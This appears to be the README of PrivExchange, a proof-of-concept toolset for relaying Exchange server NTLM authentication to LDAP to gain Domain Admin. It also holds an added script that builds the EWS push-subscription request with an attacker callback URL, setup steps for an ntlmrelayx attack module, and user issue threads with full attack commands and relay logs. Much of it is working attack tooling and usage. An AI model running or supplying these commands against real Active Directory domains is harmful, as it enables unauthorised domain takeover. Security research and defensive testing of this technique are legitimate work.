PrivExchange

Proof-of-concept tools accompanying the blog post "Abusing Exchange: One API call away from Domain Admin".

Requirements

These tools require impacket. You can install it from pip with pip install impacket, but the latest version from GitHub is recommended.

privexchange.py

This tool logs in to Exchange Web Services with the supplied user credentials and subscribes that user's mailbox to push notifications, giving a URL on the attacker's host as the callback. Exchange then connects back to that URL and authenticates with NTLM as the Exchange server's computer account (the connection is made by a process running as SYSTEM on the Exchange host); that is the authentication ntlmrelayx relays on to LDAP.
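The EWS exchange behind privexchange.py, as an added example that is not the project's own code: it builds the Subscribe SOAP request with a push callback URL and parses the SubscribeResponse, including the ServerVersionInfo header (MajorVersion 14 is Exchange 2010, which the tool reports as not vulnerable). The RequestServerVersion values are the ones the tool accepts; the sample responses are constructed for the example and the callback URL is a placeholder, so nothing here touches the network.

```python
"""EWS push subscription as used by the PrivExchange technique (added example,
not code from the PrivExchange repository). Sample responses are constructed."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Values accepted by the RequestServerVersion header.
EXCHANGE_VERSIONS = (
    "Exchange2010_SP1", "Exchange2010_SP2", "Exchange2010_SP3",
    "Exchange2013", "Exchange2016",
)

NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
}

# StatusFrequency is in minutes: even with no mailbox events Exchange POSTs a
# status notification to the URL this often, and that POST carries the
# NTLM authentication that ntlmrelayx relays.
SUBSCRIBE_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{soap}" xmlns:t="{t}" xmlns:m="{m}">
  <soap:Header>
    <t:RequestServerVersion Version="{version}" />
  </soap:Header>
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:EventTypes>
          <t:EventType>NewMailEvent</t:EventType>
          <t:EventType>CreatedEvent</t:EventType>
          <t:EventType>ModifiedEvent</t:EventType>
        </t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>{url}</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>
"""


def build_subscribe_request(attacker_url, exchange_version="Exchange2013"):
    """Return the SOAP body (bytes) to POST to /EWS/Exchange.asmx."""
    if exchange_version not in EXCHANGE_VERSIONS:
        raise ValueError("unknown RequestServerVersion: %s" % exchange_version)
    return SUBSCRIBE_TEMPLATE.format(
        version=exchange_version, url=escape(attacker_url), **NS
    ).encode("utf-8")


def parse_subscribe_response(body):
    """Extract outcome and server version from a SubscribeResponse."""
    root = ET.fromstring(body)
    info = root.find(".//t:ServerVersionInfo", NS)
    msg = root.find(".//m:SubscribeResponseMessage", NS)
    if msg is None:
        raise ValueError("no SubscribeResponseMessage in response")

    def text(tag):
        el = msg.find("m:" + tag, NS)
        return None if el is None else el.text

    return {
        "major_version": None if info is None else int(info.get("MajorVersion")),
        "response_class": msg.get("ResponseClass"),
        "response_code": text("ResponseCode"),
        "subscription_id": text("SubscriptionId"),
    }


def callback_expected(result):
    """True when a subscription was created on a server version the tool treats
    as vulnerable (it stops on MajorVersion 14, i.e. Exchange 2010)."""
    return (result["response_class"] == "Success"
            and result["subscription_id"] is not None
            and result["major_version"] != 14)


# Constructed sample responses (not captured from a real server).
SAMPLE_SUCCESS = b"""<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Header>
    <h:ServerVersionInfo MajorVersion="15" MinorVersion="1" MajorBuildNumber="1591"
        MinorBuildNumber="10" Version="V2017_07_11"
        xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types"/>
  </s:Header>
  <s:Body>
    <m:SubscribeResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Success">
          <m:ResponseCode>NoError</m:ResponseCode>
          <m:SubscriptionId>EXAMPLE-SUBSCRIPTION-ID-0001</m:SubscriptionId>
          <m:Watermark>AAAAAExampleWatermark=</m:Watermark>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </s:Body>
</s:Envelope>
"""

SAMPLE_NO_MAILBOX = b"""<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Header>
    <h:ServerVersionInfo MajorVersion="15" MinorVersion="1" MajorBuildNumber="1591"
        MinorBuildNumber="10" Version="V2017_07_11"
        xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types"/>
  </s:Header>
  <s:Body>
    <m:SubscribeResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Error">
          <m:MessageText>The SMTP address has no mailbox associated with it.</m:MessageText>
          <m:ResponseCode>ErrorNonExistentMailbox</m:ResponseCode>
          <m:DescriptiveLinkKey>0</m:DescriptiveLinkKey>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </s:Body>
</s:Envelope>
"""
```

The second sample is the shape of the failure reported when the authenticating account has no mailbox: authentication to EWS succeeds, but the Subscribe call itself returns an Error response class, so no callback should be expected.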

httpattack.py

Attack module for ntlmrelayx.py that performs the attack without knowing a user's password: it makes the EWS subscription call over a relayed user's HTTP authentication. To get it working:

  • Modify the attacker URL in httpattack.py to point to the attacker's server where the ntlmrelayx instance that relays to LDAP will run
  • Clone impacket from GitHub: git clone https://github.com/SecureAuthCorp/impacket
  • Copy this file into the impacket/impacket/examples/ntlmrelayx/attacks/ directory of the clone
  • cd impacket
  • Install the modified version of impacket with pip install . --upgrade or pip install -e . (an editable install ensures the copy of httpattack.py you edited is the one ntlmrelayx loads)

Contributors

dirkjanm
Issues

Failed on Windows

I run it on Windows, and I added the argument '--smb-port 2019' and then used 'netsh interface portproxy add v4tov4 listenport=445 listenaddress=192.168.101.108 connectport=2019 connectaddress=192.168.101.108' to redirect port 445. But I got this error message:

C:\Users\Administrator\Desktop\impacket-master\impacket-master\examples>ntlmrelayx.py -t ldap://win-7se28dskt0r.test.com --escalate-user test001 --smb-port 2019
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win-7se28dskt0r.test.com
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win-7se28dskt0r.test.com
[*] HTTPD: Client requested path: /privexchange/
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[*] HTTPD: Client requested path: /privexchange/
[-] Authenticating against ldap://win-7se28dskt0r.test.com as \ FAILED
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win-7se28dskt0r.test.com

I am getting this error on Windows 10. I disabled the firewall. What can the problem be?

File ".\ntlmrelayx.py", line 336, in <module>
c = start_servers(options, threads)
File ".\ntlmrelayx.py", line 169, in start_servers
s = server(c)
File "build\bdist.win-amd64\egg\impacket\examples\ntlmrelayx\servers\smbrelayserver.py", line 88, in __init__
File "build\bdist.win-amd64\egg\impacket\smbserver.py", line 3703, in __init__

File "c:\python27\lib\SocketServer.py", line 417, in __init__
self.server_bind()
File "c:\python27\lib\SocketServer.py", line 431, in server_bind
self.socket.bind(self.server_address)
File "c:\python27\lib\socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 10013] An attempt was made to access a socket in a way forbidden by its access permissions

SSL: UNSUPPORTED_PROTOCOL

Traceback (most recent call last):
File "privexchange.py", line 213, in <module>
main()
File "privexchange.py", line 137, in main
session.request("POST", ews_url, POST_BODY % attacker_url, headers)
File "/usr/lib/python2.7/httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 844, in send
self.connect()
File "/usr/lib/python2.7/httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
_context=self)
File "/usr/lib/python2.7/ssl.py", line 617, in __init__
self.do_handshake()
File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:726)

ntlmrelayx output

A quick question, so I tested my local network exchange server using ntlmrelayx and privexchange.py, and I had two results:
For the first one I got rpc_s_access_denied, and I don't know whether that means my local Exchange server is secured or not:
[*] Authenticating against smb://DomainController1 as Local\CSXCH01$ SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

The second:
[-] Negotiating NTLM with smb://DomainController2 failed. Skipping to next target
[*] HTTPD: Received connection from xxx.xxx.xxx.xx, attacking target smb://DomainController2
[*] HTTPD: Client requested path: /c7onjkvrkg
[-] SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support

Exchange 2010

line 215: if int(versioninfo.get('MajorVersion')) == 14:
logging.info('Exchange 2010 detected. This version is not vulnerable to PrivExchange.')

line 67: EXCHANGE_VERSIONS = ["2010_SP1","2010_SP2","2013","2016"]

I'm confused about whether all service packs of Exchange 2010 are unaffected by PrivExchange, or just SP3.

Connection reset by peer? (Tested on Exchange 2013, Server 2008)

I am having this problem on Windows:

File "privexchange.py", line 221, in <module>
main()
File "privexchange.py", line 140, in main
session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
File "/usr/lib/python2.7/httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 844, in send
self.connect()
File "/usr/lib/python2.7/httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
_context=self)
File "/usr/lib/python2.7/ssl.py", line 617, in __init__
self.do_handshake()
File "/usr/lib/python2.7/ssl.py", line 846, in do_handshake
self._sslobj.do_handshake()
socket.error: [Errno 104] Connection reset by peer

Any thoughts?

Exchange versions

Hi dude :) nice work!

I was wondering if you could add an option to select the target Exchange version.

<t:RequestServerVersion Version="Exchange2013" />

This would not work when attacking Exchange 2010 for example. The possible strings are:

Exchange2010_SP1
Exchange2010_SP2
Exchange2010_SP3
Exchange2013
Exchange2016

Thank you!!

Relay not working

I'm running this from Centos7 and get a callback from Exchange (according to tcpdump), but ntlmrelayx isn't relaying the traffic. Not sure what I'm doing wrong.

Install:
git clone https://github.com/dirkjanm/PrivExchange.git
edit line 60 of PrivExchange/httpattack.py to:
attacker_url = 'http://attackerhost.domain.com/privexchange'

git clone https://github.com/SecureAuthCorp/impacket.git
cp PrivExchange/httpattack.py impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
cd impacket && pip install -e .

Execution:
(split screen w/ tmux)
Screen 1:
sudo ntlmrelayx.py -t ldap://dc.domain.com --escalate-user exchangeUser
Executes without error: "[*] Servers started, waiting for connections"

Screen 2:
python privexchange.py -ah attackerhost.domain.com outlook.domain.com -u exchangeUser -d domain.com
Again, executes without error: "Using attacker URL: http://attackerhost.domain.com/privexchange/", "authentication was OK", "API call was successful", and so on.

I fire up tcpdump:
tcpdump -i em1 port 80
And I see HTTP traffic coming from the exchange server to attackerhost.domain.com, but I don't see anything happening on Screen 1 with ntlmrelayx.

Am I missing something?

Error on: " Enumerating relayed user's privileges."

[*] HTTPD: Received connection from X.X.X.X, attacking target ldap://DC.LOCAL
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from X.X.X.X, attacking target ldap://DC.LOCAL
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Client requested path: /privexchange/
[*] Authenticating against ldap://DC.LOCAL as DOMAIN\XCHSRV$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains

[*] Enumerating relayed user's privileges. This may take a while on large domains
Exception in thread Thread-17:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 313, in run
userSid, privs = self.validatePrivileges(self.username, domainDumper)
File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 165, in validatePrivileges
user = self.client.entries[0]
IndexError: list index out of range

Any ideas?

Detection only options?

Hi Dirk-jan, is there a way to determine exploitability without fully exploiting AD? i.e. stopping after the Exchange server's SYSTEM hash is collected.

No return on ntlmrelayx

Hi Dirk,

When I ran privexchange I got:
"Authentication was OK" and "API call was successful", but nothing happens in the ntlmrelayx window.

Connection Refused Error using PrivExchange.py script

After fixing privexchange.py to use Python 3 (using the 2to3 tool), I'm still getting a connection refused error (which I was getting before I adjusted the one line to work with py3).

please advise...

python3 privexchange.py -u username -d domain.local -ah attacker.ip --attacker-page / victim.ip

INFO: Using attacker URL: http://10.10.14.24/
Traceback (most recent call last):
File "privexchange.py", line 225, in <module>
main()
File "privexchange.py", line 140, in main
session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
File "/usr/lib/python3.7/http/client.py", line 1252, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.7/http/client.py", line 1298, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.7/http/client.py", line 1247, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.7/http/client.py", line 1026, in _send_output
self.send(msg)
File "/usr/lib/python3.7/http/client.py", line 966, in send
self.connect()
File "/usr/lib/python3.7/http/client.py", line 1414, in connect
super().connect()
File "/usr/lib/python3.7/http/client.py", line 938, in connect
(self.host,self.port), self.timeout, self.source_address)
File "/usr/lib/python3.7/socket.py", line 727, in create_connection
raise err
File "/usr/lib/python3.7/socket.py", line 716, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

Tested on Exchange 2016 (CU11) on Server 2016, relayed to a Server 2016 DC

Well, not an issue actually ^^
Just wanted to let you know that it seems you cannot get to Domain Admin in an environment where Exchange is 2016 CU11 on Server 2016 and the DC is Server 2016. I mean it sort of works: the API call succeeds and so does the authentication of the Exchange account.

I got the Domain Information (Users, Policies...) but after enumerating user rights nothing was printed, so i assume that nothing was found?

Hope this helps :)

About your blog post regarding this exploit

I tried your recommended fixes and they broke Exchange in a terrible way:

  • Enabling FE extended protection (with or without kernel mode) will break authentication
  • Removing the DisableLoopbackCheck will also break authentication

This is when authentication is done behind an L7 load balancer! I suggest this be clarified before others break their Exchange. It doesn't seem to be a problem with a single Exchange server.

Username Differs from Email

Email is firstname.lastname
Username is first initial + lastname

Is there any workaround to get it to work?

I get "authentication OK", but then an error because there is no mailbox.

getaddrinfo fails with Name or service not known

Hi,
I'm struggling to get privexchange to issue a request to my EWS; all it does is fail to resolve my target. For testing purposes I'm in the same segment as the target machine (Exchange 2013), my Linux host is able to resolve the exch01 DNS name, and nmap also shows me that its port 443 is open. Any hints to share?
